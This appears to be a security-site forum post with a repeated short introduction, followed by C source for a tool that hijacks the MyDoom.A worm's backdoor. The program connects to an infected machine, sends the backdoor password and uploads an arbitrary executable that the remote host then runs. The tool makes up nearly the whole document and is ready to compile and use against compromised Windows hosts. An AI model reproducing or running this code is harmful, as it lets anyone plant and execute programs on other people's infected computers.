As you know MyDoom.A machines are exploited by MyDoom.C and Vesser - There is a faster and more dangerous worm exploiting these machines : his name is "kiddies" !!
so here is one of the codes used by hax0rz to exploit Mydoom.A machines (many other codes in the wild)
As you know MyDoom.A machines are exploited by MyDoom.C and Vesser - There is a faster and more dangerous worm exploiting these machines : his name is "kiddies" !!
so here is one of the codes used by hax0rz to exploit Mydoom.A machines (many other codes in the wild)
Regards.
Fabien // K-OTik Staff
http://www.k-otik.com
// MyDoom.A Upload/Exec Backdoor
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#pragma lib <ws2_32.lib>
int main(int argc,char *argv[]) {
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
char doompassword[] = "\x85\x13\x3c\x9e\xa2";
char buf[1024];
int read=0;
FILE *fuckfile;
WSADATA wsaData;
if(argc<3)
{
printf("***************************************************\n");
printf("***** MyDoom.A Upload/Exec Backdoor*****\n");
printf("**** Usage: %s <ip> <port> <program to upload> ****\n", argv[0]);
printf("***************************************************\n");
return -1;
}
printf("[+] Opening File\n");
fuckfile = fopen(argv[3],"rb");
if (fuckfile==NULL) {
printf("[-] Open Failed\n");
return -1;
}
printf("[+] File found ready to send\n");
if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock.\n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
printf("[-] Connecting error\n");
return -1;
}
printf("[+] Connected\n[+] Sending executable.\n");
send(sockfd,doompassword,5,0); //sending the password :)
while (!feof(fuckfile)) {
read = fread(buf,sizeof(char),sizeof(buf),fuckfile);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return -1;
}
printf(".");
}
printf("[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 0;
}
[ reply ]